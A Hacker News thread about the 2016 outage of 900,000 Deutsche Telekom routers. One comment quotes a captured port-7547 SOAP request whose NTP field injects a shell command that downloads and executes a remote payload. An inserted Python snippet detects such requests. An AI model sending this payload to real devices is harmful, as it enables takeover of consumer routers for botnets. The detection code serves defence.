Deutsche Telekom says 900k fixed-line customers suffer outages

64 points by Bouncingsoul1, over 8 years ago

11 comments

raesene6, over 8 years ago

So from https://isc.sans.edu/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759

- this appears to be an attack on an externally visible port (7547)

- There is publicly available exploit code for this issue (https://www.exploit-db.com/exploits/40740/)

- There are at least 41 Million hosts on the Internet with that port open.

Sounds like quite a few people are going to have a bad time over this, and I'm left once again shaking my head at how someone ships an Internet facing consumer device with an open port by default.....

martinald, over 8 years ago

The level of attacks seems definitely to be ramping up.

I think the main reason for this jump has been the fact attackers are starting to make significant money out of these attacks now - especially now they can accept funds easily via Bitcoin. Before I think attacks were mainly for the lulz or very sophisticated attackers with various goals, but there must be hundreds of millions of dollars in ransoms being paid out now.

Nearly anyone can now start making very good money with some simple tools. And like any business people start innovating a lot quicker with a profit motive.

B3D4, over 8 years ago

    POST /UD/act?1 HTTP/1.1
    Host: 127.0.0.1:7547
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
    Content-Type: text/xml
    Content-Length: 526

    <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
     <SOAP-ENV:Body>
      <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
       <NewNTPServer1>`cd /tmp;wget http://l.ocal.host/2;chmod 777 2;./2`</NewNTPServer1>
       <NewNTPServer2></NewNTPServer2>
       <NewNTPServer3></NewNTPServer3>
       <NewNTPServer4></NewNTPServer4>
       <NewNTPServer5></NewNTPServer5>
      </u:SetNTPServers>
     </SOAP-ENV:Body></SOAP-ENV:Envelope>

#./2 .... busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP ...

next version step Mirai?

https://www.virustotal.com/en/file/ff6e949c7d1cd82ffc4a1b27e488b84e07959472ed05755548efec90df82701e/analysis/1480335565/
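
An added example, not part of the thread or of any commenter's post: a minimal check a defender could run over captured port-7547 traffic, flagging `SetNTPServers` calls whose `NewNTPServer` fields hold anything other than a hostname or IP literal. The function names, the sample requests and the 192.0.2.1 address are constructed for illustration.

```python
import re

ACTION = "urn:dslforum-org:service:Time:1#SetNTPServers"
# An NTP server field should hold nothing but a hostname or an IP literal.
VALID_HOST = re.compile(r"[A-Za-z0-9.:-]{1,253}")
# Regex extraction rather than an XML parser, so malformed bodies are still inspected.
FIELD = re.compile(r"<(NewNTPServer\d)>(.*?)</\1>", re.DOTALL)


def inspect_request(raw: str) -> list:
    """Return one finding per suspicious NTP field in a raw HTTP request."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip().strip('"')
    if headers.get("soapaction") != ACTION:
        return []
    findings = []
    for tag, value in FIELD.findall(body):
        value = value.strip()
        if value and not VALID_HOST.fullmatch(value):
            findings.append(f"{tag}: not a hostname or IP literal")
    return findings


def build_sample(ntp1: str) -> str:
    """Constructed request in the shape of the one quoted in the comment above."""
    body = (
        '<?xml version="1.0"?><SOAP-ENV:Envelope '
        'xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">'
        '<SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">'
        f"<NewNTPServer1>{ntp1}</NewNTPServer1><NewNTPServer2></NewNTPServer2>"
        "</u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>"
    )
    head = [
        "POST /UD/act?1 HTTP/1.1",
        "Host: 192.0.2.1:7547",  # documentation address, constructed
        f"SOAPAction: {ACTION}",
        f"Content-Length: {len(body)}",
    ]
    return "\r\n".join(head) + "\r\n\r\n" + body


BENIGN = build_sample("ntp.example.net")  # constructed
SUSPICIOUS = build_sample("`constructed-placeholder`")  # backticks: shell substitution

if __name__ == "__main__":
    print(inspect_request(BENIGN), inspect_request(SUSPICIOUS))
```

An allow-list on the field value is used here because a deny-list of shell metacharacters is easy to leave incomplete.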

Aaargh20318, over 8 years ago

Anyone else who thinks 900k routers, running 900k identical firmware versions, with 900k identical copies of any exploitable bugs, running on a predictable IP-range might be a bit of a problem, from a security PoV?

I wish ISPs stopped providing routers with their connections, if only to prevent this kind of dangerous monoculture.

noir_lord, over 8 years ago

What's scary about this is I have 100Mbps fiber at home.

At some point 900,000 routers with 100Mbps fiber might be a realistic user base that would be a tremendous amount of traffic to smack people and that's without considering amplification attacks and such.

That's assuming a volumetric attack, even just "request foo.co.uk every half second" would be catastrophic, 1.8 million requests per second would be a bit of a bugger to handle.

kriro, over 8 years ago

I also remember reports that 110 and 112 calls (German emergency numbers) were down for four hours in some county recently due to technical issues on DT's part. I never saw an explanation what the exact cause was. Fire services and police handled it decently (iirc. stuff got routed to the next city and they increased patrol cars). Still a bit alarming that there's no fail over in place and these numbers basically rely on one company (probably rooted in the fact that DT used to be state owned and is thus still implicitly trusted?).

fahrradflucht, over 8 years ago

"Based on the error pattern, we cannot exclude the possibility that the routers have been targeted by external parties with the result that they can no longer register on the network." [0]

[0] https://www.telekom.com/en/media/media-information/archive/information-on-current-problems-444862 (this should be the thread's link in my opinion)

aluhut, over 8 years ago

> If problems persisted Deutsche Telekom suggested customers disconnect their routers from the network

Actually they suggest you disconnect the router, wait a few seconds and then reconnect it.

It's fixed now according to them.

https://www.heise.de/newsticker/meldung/Grossstoerung-bei-der-Telekom-Die-Telekom-prueft-Hinweise-auf-Hackerangriff-3506044.html

mgliwka, over 8 years ago

The original disclosure of the vulnerability is also an interesting read: https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/

aibottle, over 8 years ago

This is what you get for dumb and needless centralization of infrastructure inside a capitalistic system, which does not at all incentivize maintenance and providing security!

mcrae, over 8 years ago

> and it could not rule out "targeted external factors" as the reason

Yes, and DT could also not rule out extra-terrestrial interference. But who cares?

It seems any large-scale enterprise incident is blamed on some other nebulous third-party these days (Russia, 400 lb men in their beds..) in order to shift blame elsewhere.

Do the general public see through this?